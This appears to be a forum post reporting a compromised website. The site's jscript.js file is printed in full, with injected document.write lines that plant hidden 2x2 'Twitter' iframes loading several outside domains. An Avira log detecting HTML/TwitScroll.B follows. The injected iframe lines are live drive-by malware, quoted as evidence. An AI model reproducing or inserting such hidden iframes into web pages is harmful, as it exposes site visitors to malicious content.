- http://scottisharabianlink.com/infusions/aw_ecal_panel/calendar.php?cal=week
复制代码
- document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://canadabook.ca/zmpu.html?j=846410></iframe>');
- document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://wiltonct.us/ccpn.html?j=846410></iframe>');
- /*------------------------------------------
- Flipbox written by CrappoMan
- simonpatterson@dsl.pipex.com
- ------------------------------------------*/
- function flipBox(b) {
- var a;
- if (document.images["b_" + b].src.indexOf("_on") == -1) {
- a = document.images["b_" + b].src.replace("_off", "_on");
- document.getElementById("box_" + b).style.display = "none";
- if (document.getElementById("box_" + b + "_diff")) {
- document.getElementById("box_" + b + "_diff").style.display = "block"
- }
- document.images["b_" + b].src = a;
- disply = "none";
- now = new Date();
- now.setTime(now.getTime() + 1000 * 60 * 60 * 24 * 365);
- expire = (now.toGMTString());
- document.cookie = "fusion_box_" + b + "=" + escape(disply) + "; expires=" + expire
- } else {
- a = document.images["b_" + b].src.replace("_on", "_off");
- document.getElementById("box_" + b).style.display = "block";
- if (document.getElementById("box_" + b + "_diff")) {
- document.getElementById("box_" + b + "_diff").style.display = "none"
- }
- document.images["b_" + b].src = a;
- disply = "block";
- now = new Date();
- now.setTime(now.getTime() + 1000 * 60 * 60 * 24 * 365);
- expire = (now.toGMTString());
- document.cookie = "fusion_box_" + b + "=" + escape(disply) + "; expires=" + expire
- }
- }
- function addText(f, i, a, e) {
- if (e == undefined) {
- e = "inputform"
- }
- if (f == undefined) {
- f = "message"
- }
- element = document.forms[e].elements[f];
- element.focus();
- if (document.selection) {
- var c = document.selection.createRange();
- var h = c.text.length;
- c.text = i + c.text + a;
- return false
- } else {
- if (element.setSelectionRange) {
- var b = element.selectionStart,
- g = element.selectionEnd;
- var d = element.scrollTop;
- element.value = element.value.substring(0, b) + i + element.value.substring(b, g) + a + element.value.substring(g);
- element.setSelectionRange(b + i.length, g + i.length);
- element.scrollTop = d;
- element.focus()
- } else {
- var d = element.scrollTop;
- element.value += i + a;
- element.scrollTop = d;
- element.focus()
- }
- }
- }
- function insertText(f, h, e) {
- if (e == undefined) {
- e = "inputform"
- }
- if (document.forms[e].elements[f].createTextRange) {
- document.forms[e].elements[f].focus();
- document.selection.createRange().duplicate().text = h
- } else {
- if ((typeof document.forms[e].elements[f].selectionStart) != "undefined") {
- var a = document.forms[e].elements[f];
- var g = a.selectionEnd;
- var d = a.value.length;
- var c = a.value.substring(0, g);
- var i = a.value.substring(g, d);
- var b = a.scrollTop;
- a.value = c + h + i;
- a.selectionStart = c.length + h.length;
- a.selectionEnd = c.length + h.length;
- a.scrollTop = b;
- a.focus()
- } else {
- document.forms[e].elements[f].value += h;
- document.forms[e].elements[f].focus()
- }
- }
- }
- function show_hide(a) {
- document.getElementById(a).style.display = document.getElementById(a).style.display == "none" ? "block" : "none"
- }
- function correctPNG() {
- if (navigator.appName == "Microsoft Internet Explorer" && navigator.userAgent.indexOf("Opera") == -1) {
- for (var g = 0; g < document.images.length; g++) {
- var d = document.images[g];
- var f = d.src.toUpperCase();
- if (f.substring(f.length - 3, f.length) == "PNG") {
- var b = (d.id) ? "id='" + d.id + "' " : "";
- var e = (d.className) ? "class='" + d.className + "' " : "";
- var h = (d.title) ? "title='" + d.title + "' " : "title='" + d.alt + "' ";
- var c = "display:inline-block;" + d.style.cssText;
- if (d.align == "left") {
- c = "float:left;" + c
- }
- if (d.align == "right") {
- c = "float:right;" + c
- }
- if (d.parentElement.href) {
- c = "cursor:hand;" + c
- }
- var a = "<span " + b + e + h + ' style="width:' + d.width + "px; height:" + d.height + "px;" + c + ";filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='" + d.src + "', sizingMethod='scale');"></span>";
- d.outerHTML = a;
- g = g - 1
- }
- }
- }
- }
- function getStyle(c, b) {
- if (typeof c == "string") {
- var a = document.getElementById(c)
- } else {
- var a = c
- }
- if (a.currentStyle) {
- var d = a.currentStyle[b]
- } else {
- if (window.getComputedStyle) {
- var d = document.defaultView.getComputedStyle(a, null).getPropertyValue(b)
- }
- }
- return d
- };
- /***********************************************
- * Drop Down/ Overlapping Content- © Dynamic Drive (www.dynamicdrive.com)
- * This notice must stay intact for legal use.
- * Visit http://www.dynamicdrive.com/ for full source code
- ***********************************************/
- function getposOffset(a, d) {
- var c = (d == "left") ? a.offsetLeft : a.offsetTop;
- var b = a.offsetParent;
- while (b != null) {
- if (getStyle(b, "position") != "relative") {
- c = (d == "left") ? c + b.offsetLeft : c + b.offsetTop
- }
- b = b.offsetParent
- }
- return c
- }
- function overlay(e, d, a) {
- if (document.getElementById) {
- var c = document.getElementById(d);
- c.style.display = (c.style.display != "block") ? "block" : "none";
- var b = getposOffset(e, "left") + ((typeof a != "undefined" && a.indexOf("right") != -1) ? -(c.offsetWidth - e.offsetWidth) : 0);
- var f = getposOffset(e, "top") + ((typeof a != "undefined" && a.indexOf("bottom") != -1) ? e.offsetHeight : 0);
- c.style.left = b + "px";
- c.style.top = f + "px";
- return false
- } else {
- return true
- }
- }
- function overlayclose(a) {
- document.getElementById(a).style.display = "none"
- }
- NewWindowPopUp = null;
- function OpenWindow(d, c, a, b) {
- if (NewWindowPopUp != null) {
- NewWindowPopUp.close();
- NewWindowPopUp = null
- }
- if (b == false) {
- wtop = 0;
- wleft = 0
- } else {
- wtop = (screen.availHeight - a) / 2;
- wleft = (screen.availWidth - c) / 2
- }
- NewWindowPopUp = window.open(d, "", "toolbar=no,menubar=no,location=no,personalbar=no,scrollbars=yes,status=no,directories=no,resizable=yes,height=" + a + ",width=" + c + ",top=" + wtop + ",left=" + wleft + "");
- NewWindowPopUp.focus()
- }
- function resize_forum_imgs() {
- var f;
- var e;
- if (self.innerWidth) {
- e = self.innerWidth
- } else {
- if (document.documentElement && document.documentElement.clientWidth) {
- e = document.documentElement.clientWidth
- } else {
- if (document.body) {
- e = document.body.clientWidth
- } else {
- e = 1000
- }
- }
- }
- if (e <= 800) {
- f = 200
- } else {
- if (e < 1152) {
- f = 300
- } else {
- if (e >= 1152) {
- f = 400
- }
- }
- }
- for (var c = 0; c < document.images.length; c++) {
- var b = document.images[c];
- if (b.className != "forum-img") {
- continue
- }
- var j = b.height;
- var a = b.width;
- var d = false;
- if (a <= j) {
- if (j > f) {
- b.height = f;
- b.width = a * (f / j);
- d = true
- }
- } else {
- if (a > f) {
- b.width = f;
- b.height = j * (f / a);
- d = true
- }
- }
- var h = b.parentNode;
- var g = h.parentNode;
- if (h.className != "forum-img-wrapper") {
- continue
- }
- if (d) {
- h.style.display = "inline";
- if (g.tagName != "A") {
- h.onclick = new Function("OpenWindow('" + b.src + "', " + (a + 40) + ", " + (j + 40) + ", true)");
- h.onmouseover = "this.style.cursor='pointer'"
- }
- } else {
- h.style.display = "inline"
- }
- }
- return true
- }
- function onload_events() {
- resize_forum_imgs();
- correctPNG()
- }
- window.onload = onload_events;
- document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozgn.html></iframe>');
- document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://nasaspinesurgeons.com/hzgu.html?i=846410></iframe>');
复制代码
- <iframe name=Twitter scrolling=auto frameborder=no align=center height=2
- width=2 src=http://assessor.com/oapu.html?j=846410>
- </iframe>
复制代码
- <iframe name=Twitter scrolling=auto frameborder=no align=center height=2
- width=2 src=http://canadabook.ca/zmpu.html?j=846410>
- </iframe>
复制代码
- <iframe name=Twitter scrolling=auto frameborder=no align=center height=2
- width=2 src=http://nasaspinesurgeons.com/hzgu.html?i=846410>
- </iframe>
复制代码
- <iframe name=Twitter scrolling=auto frameborder=no align=center height=2
- width=2 src=http://recoveryventurescorp.org/ozgn.html>
- </iframe>
复制代码
- <iframe name=Twitter scrolling=auto frameborder=no align=center height=2
- width=2 src=http://wiltonct.us/ccpn.html?j=846410>
- </iframe>
复制代码
Avira
2013/7/18 下午 08:31 [System Scanner] 發現惡意程式碼
檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\AVPGMUFA\jscript[1].js'
包含病毒或有害的程式 'HTML/TwitScroll.B' [virus]
已採取動作:
檔案會移動至 '541a4f5e.qua' 名稱底下的隔離區目錄。.
2013/7/18 下午 08:31 [System Scanner] 發現惡意程式碼
檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\6IHTB3IO\jquery[4].js'
包含病毒或有害的程式 'HTML/TwitScroll.B' [virus]
已採取動作:
檔案會移動至 '4c9b60e7.qua' 名稱底下的隔離區目錄。.
2013/7/18 下午 08:31 [System Scanner] 掃描
掃描結束 [已完成全部的掃描。]。
檔案數: 769
目錄數: 0
惡意程式碼數: 2
警告數: 0
2013/7/18 下午 08:31 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\6IHTB3IO\jquery[4].js 中
偵測到病毒或有害的程式 'HTML/TwitScroll.B [virus]'
執行的動作:傳輸至掃描程式
2013/7/18 下午 08:31 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\AVPGMUFA\jscript[1].js 中
偵測到病毒或有害的程式 'HTML/TwitScroll.B [virus]'
執行的動作:傳輸至掃描程式
2013/7/18 下午 08:31 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\6IHTB3IO\jquery[4].js 中
偵測到病毒或有害的程式 'HTML/TwitScroll.B [virus]'
執行的動作:拒絕存取
2013/7/18 下午 08:31 [Web Protection] 發現惡意程式碼
從 URL "http://scottisharabianlink.com/includes/jquery/jquery.js" 存取資料時,
發現病毒或有害的程式 'HTML/TwitScroll.B' [virus]。
已採取動作:已略過
2013/7/18 下午 08:31 [Web Protection] 發現惡意程式碼
從 URL "http://scottisharabianlink.com/includes/jscript.js" 存取資料時,
發現病毒或有害的程式 'HTML/TwitScroll.B' [virus]。
已採取動作:已略過
|